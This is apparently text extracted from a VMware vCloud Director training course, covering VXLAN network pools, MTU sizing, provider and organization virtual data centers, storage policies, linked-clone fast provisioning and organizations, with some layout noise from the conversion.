If you have virtual machines running on two different clusters that have different VLAN IDs these

virtual machines cannot communicate with each other unless you set up a router between the

clusters.

No VXLAN is configured.

A router is required for virtual machines in both clusters to

communicate with each other.

Virtual machines must be in different L2 broadcast domains.

DRS Cluster A DRS Cluster B


Router

VTEP VTEP




V Mw ar ev C l o u d Di r

e c t or N e t w or k i n g

3

VXLANs enable you to connect two clusters with a VXLAN wire. The VXLAN wire is a logical

connection between the two clusters. Each end of the wire must be anchored with a VXLAN Virtual

Tunnel End Point (VTEP).

VXLAN is a routable protocol that does not require special configuration within a router. BecauseVXLAN is an encapsulation protocol, VLANs are not needed to isolate traffic. Each VXLAN wire

is isolated.

VXLAN is not an encrypted protocol. Traffic is isolated, but it is not secured by encryption.

VXLAN in use. No router is required for virtual machines in both clusters to

communicate.

Virtual machines can be in the same L2 broadcast domain.

VLAN isolation is not required. Isolation is provided by VXLAN.

The VXLAN wire is a logical connection between two VTEPs.

VXLAN Virtual Tunnel End Point (VTEP) is on both ends of the VXLAN wire.

DRS Cluster A DRS Cluster B


vCloud Director automatically creates a VXLAN pool for each providerVDC that is created.

The VXLAN pool is given a name derived from the name of thecontaining provider VDC and attached to it at creation.

You cannot delete or modify the VXLAN network pool.




vCloud Director automatically sets up a network pool backed by a VXLAN. The pool is named after

the provider VDC. Each provider VDC gets a unique VXLAN pool.

Even though a VXLAN pool is available you are not required to use it. Other types of network pools

can still be used with each provider VDC.

y p

You cannot create a VXLAN network pool by another method.

If you rename a provider VDC, the associated VXLAN network pool is

renamed.



VXLAN Networking Considerations: MTU SizeSlide 3-52

To accommodate the VXLAN encapsulation overhead, L2 maximum

transmission units (MTUs) on physical switches must be set based

on the following frame size considerations.

IPv4 (Bytes) IPv6 (Bytes)

Guest L2 payload (MTU) 1500 1500




Guest L2 payload (MTU) 1500 1500

Guest L2 header 14 14

Optional guest VLAN tag 4 4

VXLAN header 8 8UDP header 8 8

IP Header 20 40

Optional outer VLAN tag 4 4

Outer frame header 14 14

IPv6 data and control - 8

Frame size 1572 1600

Benefits of VXLAN Network PoolsSlide 3-53

vSphere VXLAN networks provide the following benefits:

Logical networks spanning layer 3 boundaries

Logical networks spanning multiple racks on a single layer 2

Broadcast containment

Higher performance





e c t or N e t w or k i n g

3 Higher performance

Greater scaling than VLANs

VLANs are limited to 4094 networks.

VXLANS allow up to 16.7 million networks.



Drawbacks of VXLAN Network Pools (2)Slide 3-55

vSphere VXLAN networks have the following drawbacks:

For Link Aggregation Control Protocol (LACP), 5- tuple hash distributionmust be enabled.

If VXLAN traffic is traversing routers, then multicast routing must beenabled.

Th d d M lti t t l t d l f thi i i





3 The recommended Multicast protocol to deploy for this scenario isBidirectional Protocol Independent Multicast (PIM-BIDIR), because thehosts act as both multicast speakers and receivers at the same time.

PIM is required only if two or more hops are between VTEPs.

For more information about VXLAN in a vCloud environment, see vShield

Administration Guide.

Network Pool Advantages and Disadvantages (1)Slide 3-56

VLAN backed:

Advantages: Flexible. No special MTU settings. Routable.

Disadvantages: Requires more VLAN ID management. Physical switchesmust be programmed for VLAN ranges and set to VLAN trunking.

vCloud Director isolated network backed:

Advantages: Easy to set up No complicated VLAN ranges to track Very




Different types of network pools have different advantages and disadvantages. A solid

understanding of these advantages and disadvantages can help vCloud administrators decide when

to use which type of network pool.

Advantages: Easy to set up. No complicated VLAN ranges to track. Verysecure.

Disadvantages: Nonroutable. Requires change to MTU settings.

Port group backed:

Advantages: Can be used with both standard switches and distributedswitches.

Disadvantages: Difficult to manage. No automatic network deployment.One-to-one ratio of port groups to networks in the pool. Manualconfiguration of VLAN IDs required.



Network Pools Summary (1)Slide 3-58

Network pools are the network resource of an organization VDC.

Organization VDC networks use network pools.

All vApp networks use network pools.

External networks do not use network pools.

Organization VDC networks and vApp networks can be deployed onlyh il bl i h i d k l




Organization networks that are routed or isolated use network pools. Organization networks that

direct-connect do not use network pools. All vApp networks use network pools. Fenced vApps use

network pools.

External networks do not use network pools because external networks are created by the provider(cloud administrator). The networks are managed by the provider. They are not a resource of the

organization.

Every organization is limited in its resources. Organization networks and vApp networks can be

deployed only if enough resources are available in an assigned network pool.

Multiple organization VDCs can exist in an organization and can connect to a single network pool.

when resources are available in the assigned network pool.

In each organization VDC, only a single network pool is available.

3

Network Pools Summary (2)Slide 3-59

Four types of network pool backing are possible:

VLAN

vCloud Director isolated networks

Port groups

VXLAN





3

Lab 2: Configuring VMware vCloud Director Network PoolsSlide 3-60

Configure vCloud Director network pools






Lesson 4: vCloud Director Networking Objects in vSphereSlide 3-62

Lesson 4:

vCloud Director Networking Objects in




g j

vSphere

3



objective:

Locate vCloud Director networking objects in the vSphere Web console




V Mw ar ev C l o u d Di r e

c t or N e t w or k i n g

External Network Port GroupsSlide 3-64

An external network is backed by a port group on a standard switch ordistributed switch.




3

Network Pools and Deployed NetworksSlide 3-65

For network pools, the pool is defined as either a preconfigured portgroup or a distributed switch.

The networks deployed by using the networkpool are listed under the containing object.








3



Locate vCloud Director networking objects in the vSphere Web console











Course Introduction









g




Components

VMware vCloud Director Organization

Users






About Provider VDCsSlide 4-5

A provider VDC is a collection of vSphere resources (storage, CPU,and memory) that gives vCloud Director the ability to manage and use

those resources. Organizations get their resources from organization VDCs.

Each organization VDC is a subset of provider VDC resources that areavailable to an organization.



Module 4 VMware vCloud Director Providers 123

V Mw ar e

v C l o u d Di r e c t or P r o

v i d er s

4

VMware® vCloud Director® has two types of virtual data centers (VDCs):

• A provider virtual data center

• An organization virtual data center

A provider virtual data center is a collection and an abstraction of VMware vSphere® resources:

• Storage

• CPU

• Memory

Resource GroupsSlide 4-6

A resource group consists of standard VMware vSphere® DistributedResource Scheduler or VMware vSphere® High Availability clusters

that provide resources to a cloud.

DRS/vSphere HA cluster

vCenterServer

vCloudDirector

databaseserver

vShieldManager


Management Cluster

Resource Groups

vCenterChargeback




If you have separated vCloud Director management functions into a separate VMware vSphere®

Distributed Resource Scheduler™ (DRS) management cluster, then you will have vCloud Director

resources provided by other vSphere DRS clusters. Each VMware® vCenter Server™ system can

support multiple vSphere DRS clusters. But for management purposes, you might find it simpler to

have one vCenter Server system manage only one vSphere DRS cluster. If you decide to managemultiple DRS clusters under a single vCenter Server system you should group related clusters

together. As you plan your architecture, remember that providers are based on the resources

managed by vCenter Server. A single provider virtual data center can encompass more than a single

vCenter Server system.



DRS/vSphere HA cluster Each group: A set of VMware®ESX® or VMware® ESXi hostsmanaged by a single VMware®vCenter Server system orVMware® vShield Manager

server pairing

Types of ResourcesSlide 4-7

VDCs work with three types of resources:

CPU

Memory

Storage

CPU and memory come from vSphere resource pools.

Storage comes from vSphere datastoresthat have been identified in a vSpherestorage policy.

StorageIdentifiedin avSpherestorage

li




V Mw ar e


v i d er s

4

Resource pools are usually configured with each vSphere DRS cluster being organized into a single

resource pool. However, you can subdivide a vSphere DRS cluster into smaller resource pools.

In vSphere 5.5, storage should be organized into a storage policy. The use of a vSphere storage

policy is not required. You can configure provider virtual data centers with direct access to vSpheredatastores. But the use of a vSphere storage policy makes the management of storage easier.

ResourcePools

Datastores

MemoryCPU Storage

policy

Provider VDCsSlide 4-8

Silver Provider VDCGold Provider VDC Bronze Provider VDC




Virtual data centers are built on vSphere resources. CPU capacity, memory, and storage are at the

hardware level. vSphere collects those resources into resource pools and datastores. Provider virtual

data centers are built directly on top of vSphere resource pools and datastores. Organization virtual

data centers get their resources from provider virtual data centers.

ResourcePools Datastores

MemoryCPU Storage

Network Resources Associated with Provider VDCsSlide 4-9

When you create a provider VDC

VDC VDC

Provider VDC

Organization

External Networks Built from vSpherePort Groups

Built from vSpherePort Groups, VirtualSwitches, VLANs,VXLANS, and vCloudDirector IsolatedNetwork

Available

Associated




V Mw ar e


v i d er s

4

Organization virtual data centers are collections of resources (CPU, disk, memory, and networks)

that provide organizations’ resources.

Relationships exist between organizations, network pools, and organization virtual data centers,

including the following:• Each organization virtual data center can be assigned only one network pool.

• A single network pool can be used by multiple organization virtual data centers.

A single organization can connect to multiple network pools by leveraging multiple organization

virtual data centers.

Organization networks are built on network pools. Organization networks can be created before

creating an organization virtual data center.

When you create a provider VDC,

you are notified about whichexternal networks are availableto that provider.

Organization VDCs are directlyassociated with network pools,with quotas.

You must define network pools

before you define organizationVDCs.

ResourcePools

MemoryCPU Storage

Datastores

vCloud ResourcesSlide 4-10

vSphere datastores are organized with vSphere storage policies.

Memory and CPU resources are configured into resource pools.

Storage policies and resource pools are attached to provider VDCs.

Resources are allocated from provider VDCs to organization VDCs.

SvSphere

VCD

External Network

Organization Network

vApp Network

Network Pool

Provider VDC

Organization VDC




vSphere datastores are offered to vCloud Director as available storage through vSphere storage

policies. This storage is divided into provider virtual data centers. Organization virtual data centers

can use storage from a single provider. A single organization can have multiple organization virtual

data centers, each with a different type of storage.

The allocation of storage to resource clusters can vary depending upon how provider virtual data

centers are being allocated. If you are following the best practice recommendation of using a 1:1

mapping between provider virtual data centers and DRS clusters, then the recommendation for

storage is no different between a cloud resource cluster and a standard vSphere DRS cluster. The

exception is that if vSphere DRS clusters are being used as cloud resource clusters, they might

require larger datastores.

If resource pools are used for backing provider virtual data centers instead of DRS clusters, considerusing different types of datastores to offer multiple tiers of storage that can be grouped during the

provider virtual data center creation phase.

VLANPhysicalNetwork

PhysicalHost

FC-SCSIStorage

DRS Cluster

ResourcePool

Storage

PolicyDistributedSwitch

Distributed PortGroup

vSphere

Physical

NFS/iSCSIStorage

StoragePolicy

Relationship Between Networks and Provider VDCsSlide 4-11

Networks are not considered to be part of VDCs.

When you create a provider VDC, vCloud Director reports which

external networks are available to the cloud structures that use the newprovider VDC.




V Mw ar e


v i d er s

4

When you create a provider virtual data center, networks are not considered to be a part of the

virtual data center. But the vCloud Director UI indicates which external networks are available,

based on the resources (DRS clusters and resource pools) that you have selected as resources for the

virtual data center.

About Storage Provided to vCloud Director Slide 4-12

Shared storage is required.

vSphere DRS clusters are required.

Supported storage is based on the vSpherehardware compatibility list:

Fibre Channel (FC)

Fibre Channel over Ethernet

NFS

iSCSI




vCloud Director requires shared storage. All of the storage that is supported is based on the vSphere

hardware compatibility list. This storage includes:

• Fibre Channel

• Fibre Channel over Ethernet

• NFS

• iSCSI

All VMware® ESXi™ hosts that provide storage to vCloud Director must be members of DRS

clusters. vCloud Director is aware only of storage that is presented to it as datastores from vSphere.

vCloud Director storage:

vCloud Director sees datastores only because it operates at a higher layerthan vCenter Server.

vSphere sees the underlying technology.

About Using vSphere Storage PoliciesSlide 4-13

Some storage arrays can communicate with VMware vSphere® API forStorage Awareness.

A storage device can be assigned user-defined tags in vSphere. vSphere API for Storage Awareness capabilities and user-defined tags

are used to organize storage with a storage policy.

Storage that is identified by a storage policy can be assigned toprovider VDCs.

Each provider VDC can use storage identified in more than one storage




V Mw ar e


v i d er s

4

A vSphere storage policy is based on either VMware vSphere® API for Storage Awareness™

capabilities or user-defined storage capabilities.

When you create a provider virtual data center you, must assign at least one vSphere storage policy

to the provider virtual data center. You can also assign storage from more than one vSphere storage policy to a single provider virtual data center.

Organization virtual data centers get their storage from a single provider virtual data center. If the

provider virtual data center has access to storage from more than one vSphere storage policy, storage

from those same multiple instances of a vSphere storage policy is available to the organization

virtual data center.

NOTE

The use of a vSphere storage policy is not required. A vSphere storage policy must still be defined

on the resource cluster. But when a provider virtual data center is created, you can select one

vSphere storage policy and then have all of the shared storage covered by any vSphere storage

policy available to the provider virtual data center. The VMware® best practice is to use a vSphere

storage policy.

policy. Organization VDCs are assigned storage from a single provider VDC.

Organization VDCs can use storage identified in more than one storagepolicy.

Storage ConsiderationsSlide 4-14

Configure storage with vSphere best practices in mind.

Shared storage is required.

Allocate LUNs on a cluster-by-cluster basis.

Other considerations:

The use of raw device mappings is not supported.

NFS share is required for multiple cells.

You can use storage policies to distribute virtual machine disks to




vSphere DRS clusters used with vCloud Director must be configured to use automated vSphere DRS.

Automated vSphere DRS requires shared storage attached to all hosts in a vSphere DRS cluster.

Raw device mappings cannot be used. They are not supported. Using an RDM breaks the mobility

of VMware vSphere® vApps™.

The upload NFS share is mandatory only in multicell deployments. VMware recommends the

creation of an upload NFS share for all vCloud Director deployments. The configuration of an upload

NFS share makes it easier to add cells later, even if you originally planned to have only one cell.

The NFS share must be as large as the biggest potential vApp or media item that will be uploaded

into the catalog. You also must have enough storage space in the NFS share to take in to account

concurrent uploads. The best practice is to start with at least 500GB in the NFS upload share.

Storage should be common in the cluster. No mixed RAID or disk types are allowed in the samecluster.

Storage should be organized into tiers based on cost and performance. These tiers are usually

managed by vSphere storage policies. Virtual machines can have different disks assigned to different

storage tiers based on vSphere storage policies. For example, a customer might have an application

that was a high-speed search engine attached to a read-only database. The data for the database

might be stored on a very fast solid-state drive (SSD), and the virtual machine base disk with the

operating system might be assigned to less expensive storage.

different storage tiers.



Storage TieringSlide 4-16

Organize storage in tiers.

Separate tiers based on cost, speed, capacity, or features.

The best practice is to assign entire vSphere DRS clusters to a specifictier.

A single resource pool provides all CPU and memory in the cluster to theprovider VDC.

All shared storage in the vSphere DRS cluster is assigned to the providerVDC.




Subdivide a single vSphere DRS cluster with storage policies andresource pools only when resources are limited.

Storage Tiering and Storage PoliciesSlide 4-17

All available storage policies across selected clusters are listed atprovider VDC creation.

Organization VDC storage policies are based on a subset of storagepolicies provided by the provider VDC.

Each organization VDC has an associated default storage policy.

All virtual machines have an associated storage policy that defaults tothe organization VDC storage policy.

Virtual machine placement is based on storage policies.




V Mw ar e

v C l o u d Di r e c t or P r ov i d er s

4 You can use different storage policies with different virtual machinedisks in the same virtual machine.

Storage DRS and Storage vMotionSlide 4-18

VMware vSphere® Storage DRS is supported by vCloud Director 5.5.

When a virtual machine is migrated by using vSphere Storage vMotion,

storage policies are used to determine virtual machine placement. You can use the VMware vSphere® Web Client or VMware vCloud®

API to manually relocate virtual machine disk files under the followingconditions:

The target datastore is part of the same organization VDC as the vApp.

All virtual disks for a virtual machine are migrated to the same datastore.

If t i t l hi ff d t t




The best practice for using VMware vSphere® Storage DRS™ is to configure vSphere storage

policies and vSphere datastore clusters. VMware vSphere® Storage vMotion® migration of virtual

machines is then handled automatically by vSphere based on the configuration of the vSphere

storage policies, datastore clusters, and vSphere Storage DRS rules. This type of configuration

provides optimal performance as some datastores become too full or too busy.

You can use either VMware vSphere® Client™ or VMware vCloud® API to manually migrate a

single virtual machine, but such migration should be done carefully.

CAUTION

Use of the vSphere Client to manually migrate a virtual machine when that virtual machine is part of

a vCloud Director vApp can cause vCloud Director problems. This statement is true for both storage

location migrations and host migrations. The vSphere Client displays a warning message if you try

to directly manage an item that is managed by vCloud Director.

If you must move virtual machines off a datastore: The datastore must belong to a datastore cluster enabled by vSphere

Storage DRS.

Use the vSphere Web Client to place the datastore into StorageMaintenance Mode.

vSphere Storage DRS automatically moves all virtual machines on thedatastore to other datastores in the datastore cluster enabled by vSphereStorage DRS.

Provider VDCs and Service LevelsSlide 4-19

Create multiple provider VDCs to differentiate computing levels orperformance characteristics of a service offering.

Provider VDCs enable the cloud provider to offer different classes ofservice with associated performance, availability, and costcharacteristics.

Provider VDC:Gold

Provider VDC:Silver




V Mw ar e

v C l o u d Di r e c t or P r ov i d er s

4

A provider virtual data center (VDC) combines the compute and memory resources of a single

vCenter Server resource pool with the storage resources of one or more datastores connected to that

resource pool. A provider VDC is the source for organization VDCs.

For provider VDCs:

• vSphere resources are abstracted in the form of provider VDCs.

• Provider VDCs have a 1:1 relationship with vSphere resource pools.

• The best practice is to map the provider VDC to the full DRS cluster instead of breaking a DRS

cluster into smaller resource pools.

Service levels for infrastructure capacity offered to the cloud tenant are differentiated at the provider

VDC level. Define your service-level agreement (SLA) for the service being offered. For example,you might create three SLA tiers: Tier-1:Production, Tier2:QA, and Tier3:Dev.

With provider VDCs, you can pool infrastructure resources to create standard offerings. You can

create multiple provider VDCs for users in different geographic locations or business units, or for

users with different performance requirements. For example, you can combine your best-of-breed

compute resources with your fastest storage resources to create a Gold provider VDC. You can

charge consumers who use the Gold provider VDC a higher price for the resources than consumers

StorageCPUMemoryStorageCPUMemory

External Networks External Networks

who use resources from a Silver or Bronze provider VDC. Likewise, you can create clusters of hosts

running similar hardware and create provider VDCs based on the type of hardware providing the

compute resources.

When you create a provider VDC, vCloud Director prepares each host in the cluster associated with

the resource pool by installing an agent on each host. This process does not require a restart of the

host system.










It is possible to attach multiple provider VDCs to the same vSphere storage policy. The attachment

of multiple provider VDCs to the same vSphere storage policy is not a best practice, unless these

multiple provider VDCs are designed to provide the same level of service.

Create multiple provider VDCs to differentiate computing levels or performance characteristics of a

service offering. Segment by capacity, availability, or performance type. An example of

differentiating by availability is n+1 for a Bronze provider VDC versus n+2 for a Silver provider

VDC. As the level of expected consumption increases for a given provider VDC, add hosts to the

cluster from vCenter Server and attach more datastores.

Create different provider VDCs to differentiate between:

• Performance levels (different hardware, CPU, RAM, disk, and so on)

• Different availability levels (no HA, HA n+1, HA n+2,... HA n+4)

• Fast versus full provisioning




p g

• Special licensing requirements, where software is needed to be licensed for all cores. A

dedicated Oracle cluster is one example.

As the number of hosts in the cluster backing a provider VDC approaches the halfway mark of

vSphere limits, consider implementing controls to preserve room. Implement these controls to

preserve room well ahead of reaching the cluster limits. For example, do not add additional tenants

to this particular VDC and use the additional hosts to be added to address increased resource

demand for the existing tenants. If the cluster backing a provider VDC has reached the maximum

number of hosts per vSphere design guidelines, create a provider VDC associated with a new

cluster.

For sizing a provider VDC, consider the following:

• Expected number of virtual machines

• Size of virtual machines (CPU, RAM, disk)

Providers and Virtual Machine HardwareSlide 4-23

When you create a provider, you must specify the planned hardwarelevel for the virtual machines that the provider will support.

Hardware version 8 requires vSphere 5 ESXi hosts.

Hardware version 9 requires vSphere 5.1 ESXi hosts.

Hardware version 10 requires vSphere 5.5 ESXi hosts.




V Mw ar ev C l o u d Di r e c t or P r ov i d er s

4

Elastic VDCsSlide 4-24

Provider VDCs can span multiple vSphere DRS clusters:

All vSphere DRS clusters must be managed by the same vCenter Serversystem.

Virtual Extensible LAN (VXLAN) fabric is required.

Organization VDCs must be configured as pay-as-you-go or allocation poolmodels when provider VDCs span multiple vSphere DRS clusters.




4

Fast Provisioning Using Linked ClonesSlide 4-25

Fast provisioning:

Provisions new virtual machinesfrom a template withoutreplicating the entire image

Links the images (clones) sothat common elements arestored only once

Benefits:

Increased elasticityvmdk vmdk vmdk




V Mw ar ev C l o u d Di r e c t or P r ov

i d er s

4

Fast provisioning enables rapid provisioning of vApps with vSphere linked clones. A linked clone

uses the same base disk as the original, with a chain of delta disks to track the differences between

the original and the clone. Fast provisioning is enabled by default when allocating storage to an

organization VDC. If an organization administrator disables fast provisioning, all provisioning

operations result in full clones.

Fast provisioning benefits:

• Increased elasticity: The ability to quickly provision vApps enables cloud applications to scale

up as needed through the ability to deploy a vApp from a catalog using linked-clone technology.

• Increased operational efficiency: Use of linked clones typically results in significant

improvement in storage utilization.

Increased elasticity

Increased operational efficiency

Templatevmdk

Shadow Virtual Machines Enabling Cross-Datastore ProvisioningSlide 4-26

A shadow virtualmachine enablescross-datastore

provisioning and isinvisible to end users.

vCloud Director 5.5

vCenter Server 1 vCenter Server 2




vSphere limits the use of linked clones. Linked clones can be created only in a single datastore.

vCloud Director uses shadow virtual machines to allow linked clones to be deployed across multiple

datastores.

When vCloud Director deploys a virtual machine from a catalog, the standard procedure is to deploy

only a linked clone. But if a user requests the deployment of a virtual machine into an organizationVDC that is different from the organization VDC that the catalog is hosted in, vCloud Director

creates a shadow virtual machine.

After the shadow virtual machine is created, subsequent linked clones are deployed fast because you

are deploying linked clones to the same datastore.

For a linked clone in a single datastore, the linked clone is created almost instantaneously.

If a linked clone is requested on a different datastore, vCloud Director makes a full copy of thesource virtual machine on the destination datastore and then creates a linked clone. This full copy

operation takes more time than a standard linked clone creation. Subsequent linked clones are

almost instantaneous.

Because vCloud Director supports multiple vCenter Server systems, a user can request a linked

clone on a datastore that is on a different vCenter Server system. In this case, vCloud Director

creates a shadow virtual machine on the destination datastore before it creates the linked clone.

datastore-1

VM-6(L)

VM(S)

VM-5(L)

VM(S)

VM-4(L)

VM-3(L)

VM-2(L)

datastore-2 datastore -3

4

Considerations for Fast ProvisioningSlide 4-27

Fast provisioning requires vSphere 5.x (vCenter Server 5.x and ESXi5.x).

The best practice is to base each provider VDC on a dedicated cluster.

Tree-depth is limited to 31. After 32, a new base disk is deployed.

The use of linked clones is limited to a single datastore. For cross-datastore deployment, a new shadow virtual machine is deployed.

Some in-guest operations cause many writes (increasing delta disksize):

Defragmentation Memory dumps





i d er s

4

Fast provisioning requires vCenter Server 5.x and ESXi 5.x hosts. If the provider VDC on which the

organization VDC is based contains VMware® ESX® 4.x hosts, fast provisioning is not supported.

In the presence of both ESX 4.x and ESXi 5.x hosts in a given cluster backing the provider VDC,

the fast provisioning option is not available during organization VDC creation.

Fast provisioning in vSphere 5.1 has different limits than fast provisioning under vSphere 5.0. Under

vSphere 5.0 if fast provisioning is used the cluster size is limited to eight hosts. Under vSphere 5.1

the cluster size can be a maximum of 32 hosts, even if fast provisioning is used.

If the provider VDC on which the organization VDC is based contains any VMware vSphere®

VMFS datastores connected to more than eight hosts under vSphere 5.0, a power-on operation for a

virtual machine might fail. vSphere 5.0 datastores should be connected to a maximum of eight hosts.

VMware recommends separating datastores reserved for fast provisioning from datastores reservedfor full-clone vApp workloads for manageability and chargeback purposes. Additionally, if vCloud

Director is deployed on block based storage, VMware recommends using the vSphere DRS cluster

to back up a dedicated provider VDC for fast provisioning. All organization VDCs are created from

the dedicated provider VDC and should have Enable Fast Provisioning selected.

When you select Enable Fast Provisioning on all organization VDCs based on a dedicated provider

VDC, vCloud Director allows the implementation of linked clones across the cluster. The use of fast

Memory dumps

Application logs

provisioning on all organization VDCs attached to a single provider VDC makes it easier for the

administrator to ensure that this dedicated cluster remains under the eight-host limit. The

administrator can configure other provider VDCs not to use linked clones. These clusters where fast

provisioning is disabled can be larger than eight hosts. Applications that are write-intensive perform

better when hosted on provider VDCs that do not have fast provisioning enabled.

NOTE

Although vSphere 5.1 has an expanded limit of 32 hosts per cluster if fast provisioning is used,

administrators should still plan to start their resource clusters at less than full size to leave space for

future expansion.

Provisioning Times

Provisioning should be near instantaneous when provisioning to the same datastore. Provisioning a

virtual machine to a different datastore triggers creation of shadow virtual machines if they do notalready exist on the target datastore. The shadow virtual machine is a full copy of the virtual




machine on the target datastore. After a shadow virtual machine exists in the target datastore,

subsequent provisioning of the virtual machine occurs instantaneously, as in the same datastore case.

VMware recommends that the most frequently provisioned vApp templates be preprovisioned

across the datastores for the organization to achieve consistent instantaneous provisioning

experience.

Performance Implications

Linked-clone performance varies. Sometimes linked clones can perform better than full clones,

depending on the I/O policy of the application workload. One reason for potentially greater

performance is metadata caching. On virtual machine startup, metadata dictating which file to

access to get data is written to the ESXi copy-on-write heap. When a virtual machine does a virtual

SCSI read and hits the metadata cache, each virtual read results in a single physical read. However,

if an ESXi cache miss occurs, there will be a virtual read in addition to multiple physical reads for avirtual machine reading across many disk sectors, causing additional overhead. Linked clone

performance can be further boosted through storage array caching. The use of storage array caching

can cause commonly used base disks to be read from storage array memory cache instead of disk.

Ample storage array cache will greatly benefit an environment utilizing linked clones.

Scalability Limitations

• Tree width. Although there is no limit to the width of a tree, a datastore can fill up if a tree getstoo wide. If the datastore fills up, no clones can be created. The problem of having a full

datastore can be mitigated by using shadow virtual machines to allow cross-datastore

provisioning.

• Tree depth. Linked-clone tree depth is kept at a maximum of 31. A thirty-second leaf node

automatically creates a base disk.

4

• Eight-host limit. There is an eight-host limit imposed by vSphere 5.0 when using SAN storage.

This in turn limits max cluster size to eight hosts.

• Fast provisioning technology is based on snapshot hierarchies. Snapshot hierarchies are

composed of several VMDKs organized as a chain with one or more common base disks, each

of which are opened in read-only mode. The top-level disk (called a delta disk) is opened in

exclusive mode. Files opened in read-only locking mode cannot be opened by more than 8

hosts, so the same limitation applies to VMFS based linked clones. This limitation does notapply when vSphere uses NFS storage.

• Single-datastore. Linked clones can be used only in a single datastore. The use of shadow

virtual machines allows for cross-datastore provisioning. As shadow virtual machines are full

copies of the source virtual machines, sizing considerations for preprovisioning shadow virtual

machines across datastores should be made.

• vSphere Storage vMotion. vSphere Storage vMotion in ESXi 5.0 has been improved to supportmigration of linked clones. However, the migration of linked clones should be invoked only in

h l d i l h h h l h i ki h





i d er s

the vCloud Director layer, through the REST API Relocate_VM. When invoking the

Relocate_VM API to migrate linked clones, ensure that the target organization VDC is part of

the same provider VDC as the source organization VDC. Or ensure that the target organization

VDC is backed by a provider VDC that has the same datastore where the source vApp resides.

If the condition is not met, the API call fails.

VMware does not recommend or support VMware vSphere® vMotion® migration of linked clonesin the vSphere layer. Even if the datastores are part of a datastore cluster enabled with vSphere

Storage DRS, vCloud Director provisioned linked clones are ignored by vSphere Storage DRS in

vSphere 5.0. Under vSphere 5.1, vSphere Storage DRS can be used to automatically balance linked

clones between datastores.

Some in-guest operations can increase delta disk sizes and fill up datastores. An example of this is a

defragmenter running in the guest operating system. The virtual machine might start with very small

VMDK files built off of linked clones. But as the defragmenter runs most of the disk is rewritten.The modification of all disk sectors causes the VMDK of the linked clone delta disk to inflate back

to full size.

Linked Clones, Shadow Virtual Machines, and Storage DRSSlide 4-28

vSphere Storage DRS supports linked clones only with vCloud Director5.x.

Use the vCloud API to initiate vSphere Storage vMotion migration forlinked clones to preserve the linked-clone state.

Manual migration of a virtual machine that is built on linked clones cancause undesirable effects. These effects include problems like theinflation of delta disks.

vCloud Director does not support linked-clone configurations that spanacross datastores.

Linked clones can be migrated between VMFS3 and VMFS5:




If there is a cross-datastore linked clone configuration, vSphere Storage DRS does not make a

recommendation to place linked clones on the datastore that does not contain either the base disk or

a shadow virtual machine copy of the base disk. A cross-datastore linked clone configuration might

occur when vCloud Director APIs create it.

Linked clones can be migrated between VMFS3 and VMFS5 file systems. Several factors enter into

the decision-making process when vSphere Storage DRS is determining where to migrate a linked

clone. Factors such as the amount of data being moved, the amount of space reduction on the source

and the additional amount of space required on the destination all are considered. The major factor

is whether a shadow virtual machine of the base disk already exists on the destination.

vSphere Storage DRS provides this support.

Format conversions are handled automatically at the platform level.

4

Preparing HostsSlide 4-29

When you create the first provider VDC, vCloud Director prepares theESXi hosts in the DRS cluster.

To prepare the ESXi host, vCloud Director installs the vCloud Directoragent on the ESXi host.

When the Preparing Hosts dialog box appears, you must provide theroot user ID and password of the ESXi hosts.




V Mw ar ev

C l o u d Di r e c t or P r ov

i d er s

Lab 3: Creating Provider Virtual Data CentersSlide 4-30

Create provider virtual data centers






Key PointsSlide 4-32

Provider VDCs provide resources to organization VDCs.

Each provider VDC must be built from a resource pool.

Each provider VDC must have storage.

A provider VDC must have at least one external network.

Resource pools cannot span multiple vSphere DRS clusters.

All resource pools should be at the same level.

Storage should be divided into tiers based on cost and speed.

Use linked clones to provision new virtual machines from a templatewithout replicating the entire image.

A h d i t l hi i f ll l th t i t d h li k d




A shadow virtual machine is a full clone that is created when a linkedclone is requested on a destination datastore that is different from thesource datastore.

Questions?

M O D U L E 5

VMware vCloud Director

Organizations 5Slide 5-1

Module 5





i r e c t or Or g ani z a t i on

s

5



ImportanceSlide 5-3

You can leverage existing VMware vSphere® infrastructure

resources to deliver IT services in a private or public infrastructure

as a service cloud.

But you must first understand the technical constructs that VMware®

vCloud Director® provides.



Module 5 VMware vCloud Director Organizations 157



s

5

Module LessonsSlide 5-4

Lesson 1: Organizations

Lesson 2: Organization Virtual Data Centers

Lesson 3: vApp Templates

Lesson 4: Building and Publishing vApps

Lesson 5: Deploying and Running vApps

Lesson 6: Additional Organization VDC Networking




Lesson 1: OrganizationsSlide 5-5

Lesson 1:

Organizations






s

5



About OrganizationsSlide 5-7

An organization is a logical group of all users (consumers) to whichresources will be presented.

An organization has these characteristics:

Enforces a security boundary

Includes appropriate resources and controls

Includes one or more content repositories (catalogs)

Users Access Control

Catalogs ProvisionedPolicies

Organization: Finance






s

5

An organization is a logical group of users to which IT services are presented. Organizations

provide a security boundary, so that appropriate resources and controls can be set up for a given

group of users.

Each organization has a unique login URL. Users, locally created or imported from a Lightweight

Directory Access Protocol (LDAP) server, exist and operate only in this organization. The settingsin each organization are independent from the settings made for other organizations. (An exception

is Simple Mail Transport Protocol (SMTP) settings, which can be made per organization or by

inheriting the settings in the VMware® vCloud Director® default SMTP server.)

Organizations are isolated tenants in the cloud. Each organization has its own users, access control,

catalogs, provisioning policies, resources, and networks. Resources come from organization virtual

data centers (VDC). Each organization’s VDC gets its resources from a single provider VDC. Each

organization can have multiple organization VDCs.

OrganizationVDCs

vSphere vApp

(VMs with vAppnetwork)vApp vApp

Organization PortalsSlide 5-8

Each organization has a dedicated portal.




The vCloud Director system administrator creates the organization and provisions resources. After

the organization is created, the system administrator distributes the organization URL to the

administrator assigned to the organization (called the organization administrator). Using the URL,

the organization administrator logs in to the organization portal and sets it up, configures resource

use, adds users, and selects organization-specific policies and settings. Organization member users(consumers) can then create, use, and manage IT services packaged as VMware vSphere® vApps™.

When you select the name of the organization, do not worry about the name being visible to other

organizations. Multitenancy means that users must know the name of their organization before they

can provision resources or services. A user in one organization cannot learn the names of other

organizations through the vCloud Director user interface. Plan to create an organization for each

tenant of the cloud. Only the vCloud Director administrator can create an organization.

The organization name is used in a URL whenever a user browses to the organization portal. As aresult, the organization name must be suitable as part of a URL. Do not use spaces or special

characters in an organization name. Underlines and hyphens are permitted. Because the name is part

of a URL, the best practice is to make the name as short as possible.

Organization UsersSlide 5-9

Organization users can be created in vCloud Director or by using anLDAP server.

Each user has an administrator-assigned role.

Predefined Role Privileges

System Administrator Creates and manages provider VDCs, external networks, network pools,

organizations, organization VDCs, organization VDC networks, and catalogs

Organization

Administrator

